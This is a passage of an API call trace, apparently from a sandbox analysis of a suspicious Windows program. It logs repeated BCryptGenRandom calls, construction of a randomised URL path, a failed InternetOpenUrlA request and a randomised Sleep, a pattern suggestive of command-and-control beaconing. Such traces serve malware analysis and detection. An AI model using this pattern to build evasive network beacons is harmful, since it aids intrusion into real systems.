cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.786] GetProcessHeap () returned 0x440000 [0269.786] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473b90 [0269.787] lstrcpyA (in: lpString1=0x473b90, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0269.787] lstrcatA (in: lpString1="P²¡\x03", lpString2="/xmyg8kCset4dc6sn6zb/2sroc0mmeordws1u2qhTVvhjo912irebbmn0w9e5Gt/" | out: lpString1="P²¡\x03/xmyg8kCset4dc6sn6zb/2sroc0mmeordws1u2qhTVvhjo912irebbmn0w9e5Gt/") returned="P²¡\x03/xmyg8kCset4dc6sn6zb/2sroc0mmeordws1u2qhTVvhjo912irebbmn0w9e5Gt/" [0269.787] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0269.787] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/xmyg8kCset4dc6sn6zb/2sroc0mmeordws1u2qhTVvhjo912irebbmn0w9e5Gt/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0269.787] GetProcessHeap () returned 0x440000 [0269.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473b90 | out: hHeap=0x440000) returned 1 [0269.787] GetProcessHeap () returned 0x440000 [0269.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0269.787] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0269.787] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0269.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0269.788] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0269.788] Sleep (dwMilliseconds=0x13cb8) [0269.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0269.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.928] GetProcessHeap () returned 0x440000 [0269.928] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17de0 [0269.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17de1, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a17de1) returned 0x0 [0269.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17e0d, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a17e0d) returned 0x0 [0269.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.939] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.939] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.940] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.941] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.942] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.942] BCryptGenRandom (in: hAlgorithm=0x0, 